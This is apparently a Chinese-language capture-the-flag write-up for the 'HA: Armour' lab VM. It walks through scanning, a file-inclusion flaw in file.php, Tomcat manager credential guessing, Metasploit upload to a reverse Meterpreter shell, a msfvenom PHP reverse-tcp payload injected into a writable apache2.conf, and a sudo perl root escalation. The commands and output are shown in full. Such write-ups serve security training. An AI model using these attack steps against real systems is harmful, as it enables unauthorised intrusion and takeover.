HA: Armour-Write-up

---

下载地址：点我

bilibili：点我

信息收集

• nmap扫存活找到IP为：192.168.116.140

➜  ~ nmap -sn 192.168.116.1/24
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-09 21:21 CST
Nmap scan report for 192.168.116.1
Host is up (0.00031s latency).
Nmap scan report for 192.168.116.140
Host is up (0.00074s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 5.09 seconds
➜  ~ nmap -A -T4 192.168.116.140 -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-09 21:23 CST
Nmap scan report for 192.168.116.140
Host is up (0.0018s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HA: Armour
8009/tcp  open  ajp13   Apache Jserv (Protocol v1.3)
| ajp-methods:
|_  Supported methods: GET HEAD POST OPTIONS
8080/tcp  open  http    Apache Tomcat 9.0.24
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.24
65534/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 28:eb:55:eb:a6:63:c6:fd:23:36:31:27:de:cb:f8:0d (RSA)
|   256 a5:1b:86:a9:66:3e:b6:e6:af:d4:33:fe:2c:84:3b:62 (ECDSA)
|_  256 c7:b2:0c:45:7f:9c:a2:98:fb:52:75:0d:0d:e1:1f:24 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.68 seconds
➜  ~

• 开放80,8009,8080端口，都是Web服务分别是Apache httpd，Apache Jserv和Apache Tomcat，还有一个65534端口为ssh服务。
• 指定端口连接ssh，得到第一个flag：HulkBuster Armour:{7BDA7019C06B53AEFC8EE95D2CDACCAA}，和提示：TheOlympics

➜  ~ ssh 192.168.116.140 -p65534
The authenticity of host '[192.168.116.140]:65534 ([192.168.116.140]:65534)' can't be established.
ECDSA key fingerprint is SHA256:kYh7ax5tplAJb0W9IkeVePlscYpVFgSLsyepRlFi20A.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.116.140]:65534' (ECDSA) to the list of known hosts.
       db         88888888ba   88b           d88    ,ad8888ba,    88        88  88888888ba
      d88b        88      "8b  888b         d888   d8"'    `"8b   88        88  88      "8b
     d8'`8b       88      ,8P  88`8b       d8'88  d8'        `8b  88        88  88      ,8P
    d8'  `8b      88aaaaaa8P'  88 `8b     d8' 88  88          88  88        88  88aaaaaa8P'
   d8YaaaaY8b     88""""88'    88  `8b   d8'  88  88          88  88        88  88""""88'
  d8""""""""8b    88    `8b    88   `8b d8'   88  Y8,        ,8P  88        88  88    `8b
 d8'        `8b   88     `8b   88    `888'    88   Y8a.    .a8P   Y8a.    .a8P  88     `8b
d8'          `8b  88      `8b  88     `8'     88    `"Y8888Y"'     `"Y8888Y"'   88      `8b  
                                www.hackingarticles.in
                 HulkBuster Armour:{7BDA7019C06B53AEFC8EE95D2CDACCAA}
                              Hint 1: TheOlympics
kali-team@192.168.116.140's password:

• 浏览器访问80端口，F12发现注释里有armour，notes.txt，还有69，开始不知道什么意思。但是对TCP/UDP端口列表熟悉的话，可以猜出来是TFTP(小型文件传输协议)的端口，详细TCP/UDP端口列表。
• 可以使用nmap加UDP协议判断69端口是否开放。

➜  ~ sudo  nmap -sU -p69 192.168.116.140
[sudo] kali-team 的密码：
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-09 21:38 CST
Nmap scan report for 192.168.116.140
Host is up (0.00073s latency).
PORT   STATE         SERVICE
69/udp open|filtered tftp
MAC Address: 00:0C:29:E7:98:9F (VMware)
Nmap done: 1 IP address (1 host up) scanned in 2.92 seconds

• 因为要发送UDP报文，所以要加sudo以Root权限执行。发现目标有开放69端口。
• TFTP客户端连上服务端下载notes.txt文件，得到第二个flag。

➜  ~ atftp
tftp> connect 192.168.116.140
tftp> get notes.txt
tftp> quit
➜  ~ cat notes.txt
Spiderman Armour:{83A75F0B31435193BAFD3B9C5FD45AEC}
Hint 2: maybeevena
➜  ~

• 还有一个提示maybeevena，不知道什么鬼。先爆破80端口的php后缀文件。

➜  ~ dirb http://192.168.116.140 -X .php
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Oct  9 22:23:10 2019
URL_BASE: http://192.168.116.140/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]
-----------------
GENERATED WORDS: 4612                                                          
---- Scanning URL: http://192.168.116.140/ ----
+ http://192.168.116.140/file.php (CODE:200|SIZE:0)                                                                                                                                                                                           
-----------------
END_TIME: Wed Oct  9 22:23:13 2019
DOWNLOADED: 4612 - FOUND: 1
➜  ~

• 找到file.php，打开页面一片空白，fuzz参数。

➜  ~ wfuzz -w Kali-Team_Tools/fuzzdb/attack/business-logic/CommonMethodNames.txt --hw 0 'http://192.168.116.140/file.php?FUZZ=/etc/passwd'
libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /home/kali-team/.local/lib/python3.7/site-packages/wfuzz/plugins/payloads/bing.py Exception, msg=No module named 'shodan'
libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /home/kali-team/.local/lib/python3.7/site-packages/wfuzz/plugins/payloads/shodanp.py Exception, msg=No module named 'shodan'
********************************************************
* Wfuzz 2.4 - The Web Fuzzer                           *
********************************************************
Target: http://192.168.116.140/file.php?FUZZ=/etc/passwd
Total requests: 77
===================================================================
ID           Response   Lines    Word     Chars       Payload
===================================================================
000000033:   200        28 L     36 W     1437 Ch     "file"                                                                                                                                                                        
Total time: 0.130840
Processed Requests: 77
Filtered Requests: 76
Requests/sec.: 588.5036
➜  ~

• 找到参数为file，还是一个文件读取漏洞，因为是Apache的服务，所以先想到读取Apache相关的文件，敏感的文件有.htpasswd，一般在/etc/apache2/.htpasswd

➜  ~ curl http://192.168.116.140/file.php\?file\=/etc/apache2/.htpasswd
Ant-Man Armour:{A9F56B7ECE2113C9C4A1214A19EDE99C}
Hint 3: StarBucks
➜  ~

• 找到第三个flag，和第三个提示：StarBucks。
• 官方提示：

P.S. Klaw has a habit of dividing his passwords into 3 parts and save them at different locations. So, if you get some combine them to move forward.

• 三个提示拼起来就是：TheOlympics maybeevena starBucks，强行当密码。

tomcat 获取会话

• 浏览器打开8080端口，发现是一个Tomcat的管理页面，密码已经知道，现在来爆破用户名。

➜  CeWL git:(master) ✗ ./cewl.rb -v  http://192.168.116.140 -d 10 -w dict.txt
CeWL 5.4.6 (Exclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
Starting at http://192.168.116.140
Visiting: http://192.168.116.140, got response code 200
Attribute text found:
Offsite link, not following: https://hackingarticles.in
Writing words to file
➜  CeWL git:(master) ✗ cat dict.txt
Armour
PAGE
CONTENT
Header
ARMOUR
Collection
Armours
MCU
Photo
Grid
armour
End
Page
Content
Footer
Powered
Hacking
Articles
notes
txt
➜  CeWL git:(master) ✗ pwd
/home/kali-team/Kali-Team_Tools/CeWL
➜  CeWL git:(master) ✗

• 使用CeWL爬80端口的网页生成用户名的字典，使用MSF对Tomcat进行登录密码枚举。

msf5 auxiliary(scanner/http/tomcat_mgr_login) > show options 
Module options (auxiliary/scanner/http/tomcat_mgr_login):
   Name              Current Setting                                                 Required  Description
   ----              ---------------                                                 --------  -----------
   BLANK_PASSWORDS   true                                                            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                               yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                                                           no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                                           no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                                           no        Add all users in the current database to the list
   PASSWORD          TheOlympicsmaybeevenaStarBucks                                  no        The HTTP password to specify for authentication
   PASS_FILE         /opt/metasploit/data/wordlists/tomcat_mgr_default_pass.txt      no        File containing passwords, one per line
   Proxies                                                                           no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS            192.168.116.140                                                 yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             8080                                                            yes       The target port (TCP)
   SSL               false                                                           no        Negotiate SSL/TLS for outgoing connections
   STOP_ON_SUCCESS   false                                                           yes       Stop guessing when a credential works for a host
   TARGETURI         /manager/html                                                   yes       URI for Manager login. Default is /manager/html
   THREADS           1                                                               yes       The number of concurrent threads
   USERNAME                                                                          no        The HTTP username to specify for authentication
   USERPASS_FILE     /opt/metasploit/data/wordlists/tomcat_mgr_default_userpass.txt  no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false                                                           no        Try the username as the password for all users
   USER_FILE         /home/kali-team/Kali-Team_Tools/CeWL/dict.txt                   no        File containing users, one per line
   VERBOSE           true                                                            yes       Whether to print output for all attempts
   VHOST                                                                             no        HTTP server virtual host
msf5 auxiliary(scanner/http/tomcat_mgr_login) >

• 不知道为什么，我重启服务器后才枚举出来，用户名是：armour。
• [+] 192.168.116.140:8080 - Login Successful: armour:TheOlympicsmaybeevenaStarBucks
• Tomcat上传木马有很多方法，可以手工上传WAR文件部署。
• 这里就使用MSF比较省时间。

msf5 exploit(multi/http/tomcat_mgr_upload) > set httppassword
set httppassword
msf5 exploit(multi/http/tomcat_mgr_upload) > set httppassword TheOlympicsmaybeevenaStarBucks
httppassword => TheOlympicsmaybeevenaStarBucks
msf5 exploit(multi/http/tomcat_mgr_upload) > set httpusername armour
httpusername => armour
msf5 exploit(multi/http/tomcat_mgr_upload) > run 
[*] Started reverse TCP handler on 192.168.116.1:4444
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying wJ0oIWvcGX...
[*] Executing wJ0oIWvcGX...
[*] Undeploying wJ0oIWvcGX ...
[*] Sending stage (53867 bytes) to 192.168.116.140
[*] Meterpreter session 1 opened (192.168.116.1:4444 -> 192.168.116.140:50706) at 2019-10-09 23:47:49 +0800
meterpreter >

• 枚举本地开发端口

meterpreter > shell
Process 61 created.
Channel 75 created.
netstat -antp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:8081          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:65534           0.0.0.0:*               LISTEN      -
tcp6       0      0 :::8080                 :::*                    LISTEN      572/java
tcp6       0      0 :::80                   :::*                    LISTEN      -
tcp6       0      0 :::65534                :::*                    LISTEN      -
tcp6       0      0 127.0.0.1:8005          :::*                    LISTEN      572/java
tcp6       0      0 :::8009                 :::*                    LISTEN      572/java
tcp6       0      0 192.168.116.140:50706   192.168.116.1:4444      ESTABLISHED 685/java

• 这里发现目标主机上监听着8081端口，只能在目标本地进行访问，所以我们可以把端口转发出来，MSF里有自带的。

meterpreter > portfwd /?
Usage: portfwd [-h] [add | delete | list | flush] [args]
OPTIONS:
    -L <opt>  Forward: local host to listen on (optional). Reverse: local host to connect to.
    -R        Indicates a reverse port forward.
    -h        Help banner.
    -i <opt>  Index of the port forward entry to interact with (see the "list" command).
    -l <opt>  Forward: local port to listen on. Reverse: local port to connect to.
    -p <opt>  Forward: remote port to connect to. Reverse: remote port to listen on.
    -r <opt>  Forward: remote host to connect to.
meterpreter > portfwd add -l 8081 -p 8081 -r 127.0.0.1
[*] Local TCP relay created: :8081 <-> 127.0.0.1:8081
meterpreter >

• 现在访问自己的8081端口就可以拿到第四个flag。

➜  ~ curl http://127.0.0.1:8081
Black Panther Armour:{690B4BAC6CA9FB81814128A294470F92}

• 或者直接在目标主机访问

tomcat@ubuntu:~$ cd /tmp
cd /tmp
tomcat@ubuntu:/tmp$ wget http://127.0.0.1:8081
wget http://127.0.0.1:8081
--2019-10-10 04:46:42--  http://127.0.0.1:8081/
Connecting to 127.0.0.1:8081... connected.
HTTP request sent, awaiting response... 200 OK
Length: 56 [text/html]
Saving to: ‘index.html’
index.html          100%[===================>]      56  --.-KB/s    in 0s      
2019-10-10 04:46:42 (2.79 MB/s) - ‘index.html’ saved [56/56]
tomcat@ubuntu:/tmp$ cat index.html
cat index.html
Black Panther Armour:{690B4BAC6CA9FB81814128A294470F92}
tomcat@ubuntu:/tmp$

权限提升

• 查找GUID文件

tomcat@ubuntu:/$ find / -perm -g=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
/sbin/pam_extrausers_chkpwd
/sbin/unix_chkpwd
/usr/bin/crontab
/usr/bin/expiry
/usr/bin/chage
/usr/bin/ssh-agent
/usr/bin/wall
/usr/bin/bsd-write
/usr/bin/mlocate
tomcat@ubuntu:/$

• 查找SUID文件

tomcat@ubuntu:/$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/umount
/bin/su
/bin/ping
/bin/fusermount
/usr/bin/vmware-user-suid-wrapper
/usr/bin/traceroute6.iputils
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/chfn
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
tomcat@ubuntu:/$
tomcat@ubuntu:/$ find / -perm -4000 2>dev/null | xargs ls -la
find / -perm -4000 2>dev/null | xargs ls -la
-rwsr-xr-x 1 root root        30800 Aug 11  2016 /bin/fusermount
-rwsr-xr-x 1 root root        43088 Oct 15  2018 /bin/mount
-rwsr-xr-x 1 root root        64424 Jun 28 04:05 /bin/ping
-rwsr-xr-x 1 root root        44664 Mar 22  2019 /bin/su
-rwsr-xr-x 1 root root        26696 Oct 15  2018 /bin/umount
-rwsr-xr-x 1 root root        76496 Mar 22  2019 /usr/bin/chfn
-rwsr-xr-x 1 root root        44528 Mar 22  2019 /usr/bin/chsh
-rwsr-xr-x 1 root root        75824 Mar 22  2019 /usr/bin/gpasswd
-rwsr-xr-x 1 root root        40344 Mar 22  2019 /usr/bin/newgrp
-rwsr-xr-x 1 root root        59640 Mar 22  2019 /usr/bin/passwd
-rwsr-xr-x 1 root root       149080 Jan 17  2018 /usr/bin/sudo
-rwsr-xr-x 1 root root        18448 Jun 28 04:05 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root        10312 May 14 00:07 /usr/bin/vmware-user-suid-wrapper
-rwsr-xr-- 1 root messagebus  42992 Jun 10 11:05 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root        10232 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root       436552 Mar  4  2019 /usr/lib/openssh/ssh-keysign
tomcat@ubuntu:/$

• 查找可写目录，发现有/var/www/html

tomcat@ubuntu:/$ find / -writable -type d 2>/dev/null
find / -writable -type d 2>/dev/null
/dev/mqueue
/dev/shm
/tftpboot
/var/lib/php/sessions
/var/www/html
/var/tmp
/proc/902/task/902/fd
/proc/902/fd
/proc/902/map_files
/tmp

• 查找root用户权限可写文件

tomcat@ubuntu:/$ find / -writable -type f 2>/dev/null | grep -v "/proc/" |xargs ls -al |grep root
<ev/null | grep -v "/proc/" |xargs ls -al |grep root
-rwxrwxrwx 1 root   root     7224 Sep 21 11:30 /etc/apache2/apache2.conf
-rwxrwxrwx 1 root   tomcat   2262 Sep 21 21:15 /opt/tomcat/conf/tomcat-users.xml
--w--w--w- 1 root   root        0 Oct 10 02:00 /sys/fs/cgroup/memory/cgroup.event_control
-rw-rw-rw- 1 root   root        0 Oct 10 01:09 /sys/kernel/security/apparmor/.access
-rw-rw-rw- 1 root   root        0 Oct 10 01:09 /sys/kernel/security/apparmor/.load
-rw-rw-rw- 1 root   root        0 Oct 10 01:09 /sys/kernel/security/apparmor/.remove
-rw-rw-rw- 1 root   root        0 Oct 10 01:09 /sys/kernel/security/apparmor/.replace
tomcat@ubuntu:/$

• 找到/etc/apache2/apache2.conf和/opt/tomcat/conf/tomcat-users.xml文件可写。
• /opt/tomcat/conf/tomcat-users.xml只有之前的账号密码，只能看/etc/apache2/apache2.conf文件了。
• 查找passwd文件，每行记录又被冒号(:)分隔为7个字段分别对应：用户名:口令:用户标识号:组标识号:注释性描述:主目录:登录Shell
• group文件对应：组名:口令:组标识号:组内用户列表

tomcat@ubuntu:/$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin
armour:x:1000:1000:armour,,,:/home/armour:/bin/bash
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
tomcat:x:1001:1001::/opt/tomcat:/bin/false
aarti:x:1002:1002:,,,:/home/aarti:/bin/bash
tomcat@ubuntu:/$ 
tomcat@ubuntu:~$ cat /etc/group
cat /etc/group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:syslog,armour
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:armour
floppy:x:25:
tape:x:26:
sudo:x:27:armour
audio:x:29:
dip:x:30:armour
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:
sasl:x:45:
plugdev:x:46:armour
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
systemd-journal:x:101:
systemd-network:x:102:
systemd-resolve:x:103:
input:x:104:
crontab:x:105:
syslog:x:106:
messagebus:x:107:
mlocate:x:108:
uuidd:x:109:
ssh:x:110:
armour:x:1000:
lpadmin:x:111:armour
sambashare:x:112:armour
ssl-cert:x:113:
tomcat:x:1001:
aarti:x:1002:
tomcat@ubuntu:~$

• 找到一个普通用户aarti和armour
• 把Apache配置文件下载到自己的电脑，Apache默认以www-data用户启动的

http://192.168.116.140/file.php?file=/etc/apache2/apache2.conf

• 修改用户和组，让Apache以上面那个普通用户启动，为什么不能以Root用户启动能？因为不重新编译是不能用Root权限的，这样Web服务也起不来。所以只能改aarti的
• 覆盖Apache配置文件

tomcat@ubuntu:/etc/apache2$ wget http://192.168.116.1:8000/apache2.conf -O apache2.conf
<p://192.168.116.1:8000/apache2.conf -O apache2.conf
--2019-10-10 04:52:49--  http://192.168.116.1:8000/apache2.conf
Connecting to 192.168.116.1:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7195 (7.0K) [text/plain]
Saving to: ‘apache2.conf’
apache2.conf        100%[===================>]   7.03K  --.-KB/s    in 0s      
utime(apache2.conf): Operation not permitted
2019-10-10 04:52:49 (243 MB/s) - ‘apache2.conf’ saved [7195/7195]
tomcat@ubuntu:/etc/apache2$ cat apache2.conf

• 写入后到80端口服务下的目录写木马。(这是官方出题人写的)，我试了不对，创建文件的用户为Tomcat，aarti用户读不了这个文件，所以是访问不了的，服务端报500错误。
• 后来我利用文件包含Apache的配置文件获取到了会话。
• 就是把Shell写进Apache2.conf，再利用上面发现的文件包含漏洞。

➜  ~ msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.116.1 LPORT=2333 -o shell.php
➜  ~ cat shell.php >> apache2.conf 
msf5 exploit(multi/handler) > run 
[*] Started reverse TCP handler on 192.168.116.1:2333
[*] Sending stage (38288 bytes) to 192.168.116.140
[*] Meterpreter session 3 opened (192.168.116.1:2333 -> 192.168.116.140:48606) at 2019-10-10 13:22:53 +0800
meterpreter > getuid
Server username: aarti (1002)
meterpreter > shell
Process 12388 created.
Channel 0 created.
python3.6 -c 'import pty;pty.spawn("/bin/bash")'
aarti@ubuntu:/var/www/html$ whoami
whoami
aarti
aarti@ubuntu:/var/www/html$

提Root权限

• 列举无密码sudo，发现有一个perl

aarti@ubuntu:/var/www/html$ sudo -l
sudo -l
Matching Defaults entries for aarti on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User aarti may run the following commands on ubuntu:
    (root) NOPASSWD: /usr/bin/perl
aarti@ubuntu:/var/www/html$
aarti@ubuntu:/var/www/html$ sudo perl -e 'exec "/bin/bash";'
sudo perl -e 'exec "/bin/bash";'
root@ubuntu:/var/www/html# id
id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:/var/www/html#
root@ubuntu:~# ls
ls
final.txt
root@ubuntu:~# cat final.txt
cat final.txt
         ______   ______    _____   _     _  ______
   /\   (_____ \ |  ___ \  / ___ \ | |   | |(_____ \
  /  \   _____) )| | _ | || |   | || |   | | _____) )
 / /\ \ (_____ ( | || || || |   | || |   | |(_____ (
| |__| |      | || || || || |___| || |___| |      | |
|______|      |_||_||_||_| \_____/  \______|      |_|
    IronMan Armour:{3AE9D8799D1BB5E201E5704293BB54EF}
!! Congrats you have finished this task !!
Contact us here:
Hacking Articles : https://twitter.com/rajchandel/
AArti Singh: https://www.linkedin.com/in/aarti-singh-353698114/
+-+-+-+-+-+ +-+-+-+-+-+-+-+
 |E|n|j|o|y| |H|A|C|K|I|N|G|
 +-+-+-+-+-+ +-+-+-+-+-+-+-+
root@ubuntu:~#